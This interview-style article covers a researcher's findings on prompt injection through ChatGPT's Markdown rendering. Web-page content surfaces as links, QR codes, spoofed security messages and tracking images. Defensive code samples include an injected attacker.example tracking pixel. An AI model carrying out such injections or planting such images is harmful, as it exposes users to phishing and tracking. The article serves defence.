When Third-Party Content Appears Inside ChatGPT Responses, Trust Gets Transferred Unintentionally

Written by:

Vishwa Pandagle
Cybersecurity Staff Editor

Question: In a study, Permiso Security discovered a vulnerability in ChatGPT's Markdown rendering that could allow content from third-party web pages to seep into ChatGPT responses. Where do filters need to be added to prevent phishing, tracking, and social engineering attacks? What was the most unexpected finding during the investigation?

Andi Ahmeti, Threat Researcher at Permiso Security

One of the most interesting aspects of this research was that the issue was not fundamentally a model problem; it was a trust boundary problem.

Most discussions around prompt injection focus on whether a model can be influenced by untrusted content. At this point, we know the answer is yes. The more important question is what happens after the model has been influenced.

In our investigation, we found that content originating from a third-party web page could make its way into a ChatGPT response and be rendered as:

- clickable links,
- images,
- QR codes, and
- system-style messages inside a trusted assistant interface.

The real risk was not the prompt injection itself; it was the transformation of untrusted content into trusted UI.

The most unexpected finding was how little user interaction was required.

We tend to think about phishing as something that begins with a click. In some of our tests, simply asking ChatGPT to summarize a page was enough to trigger remote image requests to attacker-controlled infrastructure.

In others, we were able to render QR codes and spoofed account-security messaging directly inside the assistant response. The attack surface extended beyond traditional phishing and into passive tracking and cross-device social engineering.
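To make the passive-tracking path concrete, here is a minimal sketch of how a client might list the remote images that would be fetched if a response were rendered verbatim. The function name, the regular expression, and the example URLs are illustrative assumptions, not part of the Permiso research or of ChatGPT's actual renderer, and the pattern only covers inline Markdown images.

```python
import re
from urllib.parse import urlparse

# Matches inline Markdown images of the form ![alt](url "optional title").
# Assumption: reference-style images and raw HTML <img> tags are out of scope.
IMAGE_PATTERN = re.compile(r'!\[[^\]]*\]\(\s*<?([^\s)>]+)>?[^)]*\)')


def remote_image_urls(markdown_text: str) -> list[str]:
    """Return http(s) image URLs that a naive renderer would fetch on display."""
    urls = []
    for match in IMAGE_PATTERN.finditer(markdown_text):
        url = match.group(1)
        # Only network schemes cause an outbound request; data: URIs do not.
        if urlparse(url).scheme in ("http", "https"):
            urls.append(url)
    return urls


# Hypothetical response text containing an injected tracking image.
response = (
    "Here is the summary of the page.\n"
    "![status](https://attacker.example/pixel.png?u=12345)\n"
    "See also [the docs](https://docs.example/guide)."
)
print(remote_image_urls(response))
```

Each URL in the returned list is a request that would reach a remote server as soon as the response is displayed, with no click from the user. Ordinary links are not included because they require user interaction.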

From a defensive perspective, I don't believe this problem can be solved exclusively at the model layer. The industry has invested heavily in prompt-injection detection and guardrails, but attackers only need one successful path through those controls.

The more reliable place to enforce security is at the rendering layer. If content originates from an untrusted source, the client should preserve that context all the way to the user interface.

For example:

- Links extracted from summarized web content should not be rendered the same way as links generated by the assistant.
- Remote images sourced from third-party content should not be fetched automatically.
- QR codes should be treated as encoded URLs rather than harmless images.

In short, the renderer should apply security controls based on provenance, not just on what the model decides to output.
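The provenance-based approach described above could be sketched as a small policy function in the client. Everything here is a hypothetical illustration: the `Segment` type, the `Provenance`, `Kind`, and `Action` names, and the assumption that the client can tag each piece of a response with its origin are not taken from any real renderer.

```python
from dataclasses import dataclass
from enum import Enum


class Provenance(Enum):
    ASSISTANT = "assistant"      # content the assistant composed itself
    THIRD_PARTY = "third_party"  # content derived from a retrieved web page


class Kind(Enum):
    TEXT = "text"
    LINK = "link"
    IMAGE = "image"
    QR_CODE = "qr_code"


class Action(Enum):
    RENDER = "render"                  # display normally
    RENDER_LABELED = "render_labeled"  # display, visibly marked as third-party
    DEFER_FETCH = "defer_fetch"        # do not load until the user opts in
    SHOW_AS_URL = "show_as_url"        # show the encoded destination as text


@dataclass(frozen=True)
class Segment:
    kind: Kind
    provenance: Provenance
    payload: str  # link target, image URL, QR destination, or plain text


def decide(segment: Segment) -> Action:
    """Choose a rendering action from provenance first, content type second."""
    if segment.provenance is Provenance.ASSISTANT:
        return Action.RENDER
    if segment.kind is Kind.IMAGE:
        return Action.DEFER_FETCH   # no automatic remote request
    if segment.kind is Kind.QR_CODE:
        return Action.SHOW_AS_URL   # treat the code as the URL it encodes
    # Third-party links and text stay visible but are labeled as untrusted.
    return Action.RENDER_LABELED


# Hypothetical segment taken from a summarized web page.
pixel = Segment(Kind.IMAGE, Provenance.THIRD_PARTY, "https://attacker.example/p.png")
print(decide(pixel))
```

The design choice in this sketch is that the decision never inspects what the model wrote, only where the segment came from and what type it is, so a successful prompt injection does not change the outcome.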

The larger challenge is that AI systems are increasingly becoming brokers of trust. Users are conditioned to treat assistant responses differently than they treat raw web content. Attackers understand this and are adapting accordingly.

Historically, they had to convince users to trust an email, a document, or a website. Increasingly, they only need to convince an AI system to repeat or reformat their content. What concerns me most is the imbalance between attacker and defender incentives:

Attackers only need to identify one path where content can cross a trust boundary and be rendered in a more trustworthy context.

Defenders, meanwhile, are trying to secure an ecosystem that now spans:

- models,
- retrieval systems,
- agents,
- browsers,
- renderers,
- plugins, and
- third-party integrations.

Every new capability expands the number of places where trust can be unintentionally transferred. Organizations should start treating AI rendering layers as part of their attack surface today. Security reviews cannot stop at model behavior.

They need to include:

- How retrieved content is displayed.
- What external resources are automatically loaded.
- Whether users can distinguish between assistant-generated content and untrusted third-party data.

As AI assistants become more integrated into everyday workflows, those distinctions will matter far more than whether a prompt injection technically succeeds.
